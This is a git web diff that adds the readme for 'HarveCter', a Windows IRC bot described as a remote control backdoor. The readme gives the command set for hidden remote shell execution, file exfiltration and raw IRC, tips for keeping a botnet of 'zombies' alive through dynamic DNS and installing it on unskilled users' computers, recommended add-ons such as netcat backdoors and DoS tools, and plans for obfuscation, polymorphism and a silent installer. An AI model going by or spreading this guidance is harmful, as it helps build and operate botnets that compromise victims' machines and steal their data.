Merged some nasty programs from softz.harvie.cz
[mirrors/Programs.git] / misc / semi-private.projects / harvecter.nfo
diff --git a/misc/semi-private.projects/harvecter.nfo b/misc/semi-private.projects/harvecter.nfo
new file mode 100755 (executable)
index 0000000..d7f08b6
--- /dev/null
@@ -0,0 +1,125 @@
+ <>=========================================================== 1001 1001 1011 1110 0000 01101 1110 ===<>\r
+                   ___          ___          ___                                 ___     \r
+                  /__/\        /  /\        /  /\         ___       ___         /  /\    \r
+                  \  \:\      /  /::\      /  /::\       /__/\     /  /\       /  /:/_   \r
+                   \__\:\    /  /:/\:\    /  /:/\:\      \  \:\   /  /:/      /  /:/ /\  \r
+               ___ /  /::\  /  /:/~/::\  /  /:/~/:/       \  \:\ /__/::\     /  /:/ /:/_ \r
+              /__/\  /:/\:\/__/:/ /:/\:\/__/:/ /:/___ ___  \__\:\\__\/\:\__ /__/:/ /:/ /\\r
+              \  \:\/:/__\/\  \:\/:/__\/\  \:\/::::://__/\ |  |:|   \  \:\/\\  \:\/:/ /:/\r
+               \  \::/      \  \::/      \  \::/~~~~ \  \:\|  |:|    \__\::/ \  \::/ /:/ \r
+                \  \:\       \  \:\       \  \:\      \  \:\__|:|    /__/:/   \  \:\/:/  \r
+                 \  \:\       \  \:\       \  \:\      \__\::::/     \__\/     \  \::/   \r
+                  \__\/        \__\/        \__\/          ~~~~                 \__\/    \r
\r
+ <>===== IRC Bot ================================================================ <-- Harvie 2oo7 ====<>\r
+ <>                                                                                                   <>\r
+ <>  <>GENERAL                                                                                        <>\r
+ <>   Name:                  HarveCter                                                                <>\r
+ <>   Subject:               IRC Bot                                                                  <>\r
+ <>   Description:           Remote Control/Backdoor/Zombie/etc... Everything is controled by IRC     <>\r
+ <>   Version:               1.0                                                                      <>\r
+ <>                                                                                                   <>\r
+ <>  <>DETAILS                                                                                        <>\r
+ <>   Platform:              Microsoft Windows (Tested on 2000, XP SP1, XP SP2)                       <>\r
+ <>   Language:              Ansi C + Few windows libs (Windows & WinSock)                            <>\r
+ <>   Author:                <-- Harvie                                                               <>\r
+ <>   Date:                  2oo7                                                                     <>\r
+ <>   Contact:               Harvie@irc.2600.net                                                      <>\r
+ <>                                                                                                   <>\r
+ <>=====0=======================================================================================1=====<>\r
+ <>======0=======================================================================================1====<>\r
+ <>====000=============================================================== <-- Harvie 2oo7 =====111====<>\r
+\r
+ <>===== INFO ================================================ 1001 1001 1011 1110 0000 01101 1110 ===<>\r
\r
+ <>Building info:\r
+Optimalized for Dev-Cpp.\r
+Compile as windows GUI app. to make a daemon.\r
+\r
+ <>Warnings:\r
+There is not so big security!!!\r
+If you want to keep your zombies,\r
+control them only by PM or at completely secure channel!!!\r
+All passwords, that are starting with your password will be accepted!!!\r
+If you want to keep your botnet use Dynamic IRC server maping (by Dynamic DNS),\r
+rather than sending bots directly to one server (as irc.2600.net:6667)!!!\r
+\r
+ <>Setting up:\r
+- You can do all settings in source.\r
+- for better security use a different password for channel and bots.\r
+\r
+ <>Commands:\r
+- Warning: all commands are case sensitive\r
+\r
+- !login [login]              //Bad login=logout\r
+- !chanpass                   //Set mode +k (each bot sends this when connected)\r
+\r
+ <>Privileged commands (needs login)\r
+- !SAY [msg]                  //Say msg\r
+- !CMD [shell command]        //Execute command @ bot (hidden console window)\r
+- !CMD start [shell command]  //Execute command @ bot (show console window)\r
+- !head [file to send]        //Send few (maxlines_to_send) lines of file\r
+- !raw [line to send]         //Sends raw line to server (you can OP yourself)\r
+- !info                       //Info about zombie\r
+- !time                       //Local time @ zombie\r
+- !show                       //Show console window\r
+- !hide                       //Hide console window\r
+- !restart                    //Restart connection to server\r
+- !respawn                    //Restart whole zombie\r
+\r
+ <>Startup commands:\r
+Each time when the bot starts, he executes the "hircb.rc.bat" file - hidden (UTFS).\r
+\r
+ <>More functions:\r
+If you want to add more functions to this bot, you can add them direct to the code,\r
+or you can simple add executable binaries to its directory (!CMD binary.exe).\r
+This binary must be fully controlled from CLI (command line).\r
+\r
+ <>Recommended binaries to add:\r
+- Wget (wget.exe)   - Allows you to download files from http & ftp (add functions online...)\r
+- cURL (curl.exe)   - Allows you to upload files to your server (needs some php scripts...)\r
+\r
+ <>Another usefull binaries:\r
+- NetCat (nc.exe)   - Useful (Easy Networking, Firewall test, Backdoor, etc...) - you know...\r
+- Servers           - FTP(SlimFTPd), HTTP(you can strip Apache), SMTP, SOCKS, Proxy\r
+- Runtimes          - Unix(CygWin), Java(JArX) PHP, Perl, Python\r
+- NirCMD2           - (nircmdc.exe) Work with special windows features (mouse,gui,system functions,...)\r
+- CLAmp (clamp.exe) - Winamp Control (Yeah! What do you expected???)\r
+- Anything else     - DoS, mailing (Don't do any ilegal stuff with this - just testing!!!)\r
+\r
+ <>Recommendations:\r
+- Use some free DNS service to move zombies across servers.\r
+- Take very big care about channel security.\r
+- Install this bot only at n00bz' computers, because there is no encryption\r
+   (anybody else can sniff and get passwords, etc...)\r
+\r
+ <>Version history:\r
+- future  - Maybe some bugfixes\r
+- 1.0     - Fixed for overflows, checked bounds, etc..., reformated/reidented source\r
+- 1.0bRC1 - Implemented Connection checker (new thread), Implemented "!line"\r
+- 1.0b    - Bugfixes (cmdfile), Implemented "!respawn"\r
+- 0.9     - Executing hircb.rc.bat at startup, first use "In the Wild" -> found bugs, need "!respawn"\r
+- 0.8     - Hidden execution\r
+- 0.7     - Implemented "!info" & "!time"\r
+- 0.6     - Implemented "!login" function\r
+- 0.5     - Implemented "!CMD" function\r
+- other   - I can't remember ;D\r
+\r
+ <>To Do:\r
+- Need SSL to Rock!\r
+- Binary obfuscation better than UPX\r
+- Polymorfism?\r
+- Test binary on "W0W MS OS Vista" (sorry, im running Linux ;)\r
+- Implement some minimalistic hack, which allows you to download wget\r
+- Utility for changing bot settings by direct binary patching without recompiling\r
+- Automatic silent installer\r
+\r
+ <>Terms of use:\r
+- Use it like you want [use, change, abuse]!\r
+- There is no warranty, because this is free of charge for you!\r
+- There is no responsibility from side of author, because this is tool only!\r
+- Only you are responsible for yours acts!\r
+\r
+ <>=====0=======================================================================================1=====<>\r
+ <>======0=======================================================================================1====<>\r
+ <>====000============================================================= <-- Harvie 2oo7/8 =====111====<>\r
This page took 0.112775 seconds and 4 git commands to generate.